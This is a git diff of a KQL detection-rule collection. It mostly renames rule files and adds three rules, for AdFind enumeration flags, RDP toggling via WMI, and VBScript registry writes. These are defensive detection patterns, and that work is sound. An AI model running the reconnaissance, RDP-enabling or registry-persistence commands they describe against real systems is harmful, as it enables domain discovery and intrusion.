KQL/rules/Execution/psexec_service_execution.kql rename to KQL/rules/windows/process_creation/psexec_service_execution.kql diff --git a/KQL/rules/Command and Control/pua_3proxy_execution.kql b/KQL/rules/windows/process_creation/pua_3proxy_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_3proxy_execution.kql rename to KQL/rules/windows/process_creation/pua_3proxy_execution.kql diff --git a/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql new file mode 100644 index 00000000..221c1c19 --- /dev/null +++ b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - AdFind Suspicious Execution +// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community +// Date: 2021-02-02 +// Level: high +// Description: Detects AdFind execution with common flags seen used during attacks +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u +// False Positives: +// - Legitimate admin activity + +DeviceProcessEvents +| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains "-sc dclist" or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd" \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_adidnsdump_execution.kql rename to KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql diff --git a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql rename to KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql diff --git a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql rename to KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql diff --git a/KQL/rules/Execution/pua_advancedrun_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql similarity index 100% rename from KQL/rules/Execution/pua_advancedrun_execution.kql rename to KQL/rules/windows/process_creation/pua_advancedrun_execution.kql diff --git a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql rename to KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql diff --git a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql rename to KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql diff --git a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql b/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql rename to KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql diff --git a/KQL/rules/Discovery/pua_crassus_execution.kql b/KQL/rules/windows/process_creation/pua_crassus_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_crassus_execution.kql rename to KQL/rules/windows/process_creation/pua_crassus_execution.kql diff --git a/KQL/rules/Resource Development/pua_csexec_execution.kql b/KQL/rules/windows/process_creation/pua_csexec_execution.kql similarity index 100% rename from KQL/rules/Resource Development/pua_csexec_execution.kql rename to KQL/rules/windows/process_creation/pua_csexec_execution.kql diff --git a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql b/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/pua_defendercheck_execution.kql rename to KQL/rules/windows/process_creation/pua_defendercheck_execution.kql diff --git a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql b/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql similarity index 100% rename from KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql rename to KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql diff --git a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql rename to KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql diff --git a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql rename to KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql diff --git a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql b/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql similarity index 100% rename from KQL/rules/Credential Access/pua_mouse_lock_execution.kql rename to KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql diff --git a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql rename to KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/windows/process_creation/pua_ngrok_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_ngrok_execution.kql rename to KQL/rules/windows/process_creation/pua_ngrok_execution.kql diff --git a/KQL/rules/Command and Control/pua_nimgrab_execution.kql b/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_nimgrab_execution.kql rename to KQL/rules/windows/process_creation/pua_nimgrab_execution.kql diff --git a/KQL/rules/Execution/pua_nircmd_execution.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution.kql similarity index 100% rename from KQL/rules/Execution/pua_nircmd_execution.kql rename to KQL/rules/windows/process_creation/pua_nircmd_execution.kql diff --git a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql similarity index 100% rename from KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql rename to KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql diff --git a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql b/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_nmap_zenmap_execution.kql rename to KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql diff --git a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql similarity index 100% rename from KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql rename to KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql diff --git a/KQL/rules/Execution/pua_nsudo_execution.kql b/KQL/rules/windows/process_creation/pua_nsudo_execution.kql similarity index 100% rename from KQL/rules/Execution/pua_nsudo_execution.kql rename to KQL/rules/windows/process_creation/pua_nsudo_execution.kql diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql similarity index 100% rename from KQL/rules/Reconnaissance/pua_pingcastle_execution.kql rename to KQL/rules/windows/process_creation/pua_pingcastle_execution.kql diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql similarity index 100% rename from KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql rename to KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql diff --git a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql similarity index 100% rename from KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql rename to KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/pua_process_hacker_execution.kql rename to KQL/rules/windows/process_creation/pua_process_hacker_execution.kql diff --git a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql b/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql similarity index 100% rename from KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql rename to KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql diff --git a/KQL/rules/Exfiltration/pua_rclone_execution.kql b/KQL/rules/windows/process_creation/pua_rclone_execution.kql similarity index 100% rename from KQL/rules/Exfiltration/pua_rclone_execution.kql rename to KQL/rules/windows/process_creation/pua_rclone_execution.kql diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql similarity index 100% rename from KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql rename to KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql diff --git a/KQL/rules/Execution/pua_runxcmd_execution.kql b/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql similarity index 100% rename from KQL/rules/Execution/pua_runxcmd_execution.kql rename to KQL/rules/windows/process_creation/pua_runxcmd_execution.kql diff --git a/KQL/rules/Discovery/pua_seatbelt_execution.kql b/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_seatbelt_execution.kql rename to KQL/rules/windows/process_creation/pua_seatbelt_execution.kql diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_softperfect_netscan_execution.kql rename to KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql diff --git a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql similarity index 100% rename from KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql rename to KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql diff --git a/KQL/rules/Persistence/pua_system_informer_execution.kql b/KQL/rules/windows/process_creation/pua_system_informer_execution.kql similarity index 100% rename from KQL/rules/Persistence/pua_system_informer_execution.kql rename to KQL/rules/windows/process_creation/pua_system_informer_execution.kql diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql similarity index 100% rename from KQL/rules/Discovery/pua_trufflehog_execution.kql rename to KQL/rules/windows/process_creation/pua_trufflehog_execution.kql diff --git a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql b/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql similarity index 100% rename from KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql rename to KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql diff --git a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql similarity index 100% rename from KQL/rules/Execution/pua_wsudo_suspicious_execution.kql rename to KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql diff --git a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql rename to KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql similarity index 100% rename from KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql rename to KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql diff --git a/KQL/rules/Execution/python_inline_command_execution.kql b/KQL/rules/windows/process_creation/python_inline_command_execution.kql similarity index 100% rename from KQL/rules/Execution/python_inline_command_execution.kql rename to KQL/rules/windows/process_creation/python_inline_command_execution.kql diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql similarity index 100% rename from KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql rename to KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql diff --git a/KQL/rules/Execution/query_usage_to_exfil_data.kql b/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql similarity index 100% rename from KQL/rules/Execution/query_usage_to_exfil_data.kql rename to KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/windows/process_creation/quickassist_execution.kql similarity index 100% rename from KQL/rules/Command and Control/quickassist_execution.kql rename to KQL/rules/windows/process_creation/quickassist_execution.kql diff --git a/KQL/rules/Defense Evasion/raccine_uninstall.kql b/KQL/rules/windows/process_creation/raccine_uninstall.kql similarity index 100% rename from KQL/rules/Defense Evasion/raccine_uninstall.kql rename to KQL/rules/windows/process_creation/raccine_uninstall.kql diff --git a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql b/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql similarity index 100% rename from KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql rename to KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql diff --git a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql diff --git a/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql new file mode 100644 index 00000000..52185e31 --- /dev/null +++ b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql @@ -0,0 +1,15 @@ +// Title: RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class +// Author: Daniel Koifman (KoifSec), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-15 +// Level: medium +// Description: Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell. +// In PowerShell one-liner commands, the "SetAllowTSConnections" method of the "Win32_TerminalServiceSetting" class may be used to enable or disable RDP. +// In WMIC, the "rdtoggle" alias or "Win32_TerminalServiceSetting" class may be used for the same purpose. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001, attack.execution, attack.t1047 +// False Positives: +// - Legitimate system administrators enabling RDP for remote support +// - System configuration scripts during deployment + +DeviceProcessEvents +| where (ProcessCommandLine contains "rdtoggle" or ProcessCommandLine contains "Win32_TerminalServiceSetting") and ProcessCommandLine contains "SetAllowTSConnections" and ((FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql diff --git a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql similarity index 100% rename from KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql rename to KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql diff --git a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql similarity index 100% rename from KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql rename to KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql similarity index 100% rename from KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql rename to KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql diff --git a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql b/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql similarity index 100% rename from KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql rename to KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql diff --git a/KQL/rules/Persistence/reg_add_suspicious_paths.kql b/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql similarity index 100% rename from KQL/rules/Persistence/reg_add_suspicious_paths.kql rename to KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql similarity index 100% rename from KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql rename to KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql diff --git a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql b/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql similarity index 100% rename from KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql rename to KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql diff --git a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql rename to KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql similarity index 100% rename from KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql rename to KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql similarity index 100% rename from KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql rename to KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql diff --git a/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql new file mode 100644 index 00000000..8e185f1f --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql @@ -0,0 +1,12 @@ +// Title: Registry Modification Attempt Via VBScript +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-08-13 +// Level: medium +// Description: Detects attempts to modify the registry using VBScript's CreateObject("Wscript.shell") and RegWrite methods via common LOLBINs. +// It could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell. +// Threat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "Wscript.shell" and ProcessCommandLine contains ".RegWrite" \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql b/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql similarity index 100% rename from KQL/rules/Persistence/registry_modification_via_regini_exe.kql rename to KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql diff --git a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql rename to KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql diff --git a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql similarity index 100% rename from KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql rename to KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql rename to KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql rename to KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql similarity index 100% rename from KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql rename to KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql rename to KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql rename to KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql diff --git a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql rename to KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql diff --git a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql similarity index 100% rename from KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql similarity index 100% rename from KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql diff --git a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql similarity index 100% rename from KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql rename to KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql similarity index 100% rename from KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql rename to KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql 